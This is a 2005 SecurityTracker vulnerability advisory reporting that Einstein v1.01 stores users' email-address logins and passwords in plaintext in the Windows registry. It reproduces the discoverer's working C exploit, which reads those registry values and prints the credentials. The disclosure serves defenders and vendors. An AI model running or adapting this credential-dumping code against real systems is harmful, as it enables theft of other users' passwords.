Einstein Discloses Passwords to Local Users
|
|
SecurityTracker Alert ID: 1013316 |
|
SecurityTracker URL: http://securitytracker.com/id/1013316
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 28 2005
|
Impact:
Disclosure of authentication information
|
Exploit Included: Yes
|
Version(s): 1.01 and prior versions
|
Description:
Kozan reported a vulnerability in Einstein. A local user can obtain usernames and passwords.
The software stores usernames and passwords in the Windows Registry in plaintext form. A local user can view the passwords.
Kozan discovered this vulnerability.
|
Impact:
A local user can view passwords.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: bfriendly.com/ (Links to External Site)
|
Cause:
Access control error
|
Underlying OS: Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: Einstein v1.01 Discloses Passwords to Local Users
|
---------------------
Application:
---------------------
Einstein v1.01 (and prior versions)
---------------------
Introduction:
---------------------
Vendor: Einstein v1.01
Vendor Description: Einstein is a file-sharing network
for students wishing to share homework, term papers,
and tests. Find free work, and buy and sell premium
content. Includes a built-in search engine for campus
parties and special events.
---------------------
Bug:
---------------------
Einstein v1.01 stores username(mail address) and passwords in
registry with plain text format without crypting and
can be viewed by a local user.
---------------------
Vendor Confirmed:
---------------------
No.
---------------------
Fix:
---------------------
There is no solution at the time of this entry.
---------------------
Exploit:
---------------------
/*******************************************************************
Einstein v1.01 Local Password Disclosure Exploit by Kozan
Application: Einstein v1.01 (and previous versions)
Procuder: Bfriendly.com
Vulnerable Description: Einstein v1.01 discloses passwords
to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com
*******************************************************************/
#include <stdio.h>
#include <windows.h>
HKEY hKey;
#define BUFSIZE 100
char username[BUFSIZE], password[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int main(void)
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\einstein",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "username", NULL, NULL,
(LPBYTE) username, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
RegCloseKey(hKey);
printf("En error occured!");
return 0;
}
lRet = RegQueryValueEx( hKey, "password", NULL, NULL,
(LPBYTE) password, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
RegCloseKey(hKey);
printf("En error occured!");
return 0;
}
RegCloseKey( hKey );
printf("Einstein v1.01 Local Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com\n");
printf("kozan@netmagister.com\n\n");
printf("Username: %s\n",username);
printf("Password: %s\n",password);
}
else{
printf("Einstein v1.01 is not installed on your system!\n");
}
return 0;
}
Kozan...
|
|
